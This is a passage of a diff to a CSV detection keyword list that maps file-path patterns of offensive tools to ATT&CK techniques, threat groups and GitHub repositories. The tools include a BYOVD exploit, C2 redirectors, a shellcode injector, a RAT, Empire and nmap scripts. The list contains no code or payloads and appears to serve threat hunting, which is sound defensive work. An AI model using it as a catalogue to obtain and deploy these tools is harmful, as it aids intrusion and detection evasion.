- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Reaper.git*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*/Reaper/Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*/ReaperX64.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*/REC2.git*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*/recon-archy.git*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*/RecycledInjector*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*/RecycledInjector.git*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*/RedGuard.git*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*/RedGuard.go*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/Reaper.git*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/Reaper/Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/ReaperX64.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/REC2.git*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*/recon-archy.git*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*/RecycledInjector*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/RecycledInjector.git*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/RedGuard.git*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard.go*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/redirector/redirector.py*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4958,13 +5008,13 @@ "*/RedPeanut.html*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutAgent/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutRP/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*/RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*/RedPersist.git*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/RedPersist.git*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*/redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*/redsocks-fw.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*/RedTeam_toolkit*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" "*/red-team-scripts*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"*/RedWarden.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/RedWarden.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*/ReferenceSourceLibraries/Sharpire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/ReflectiveDll.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 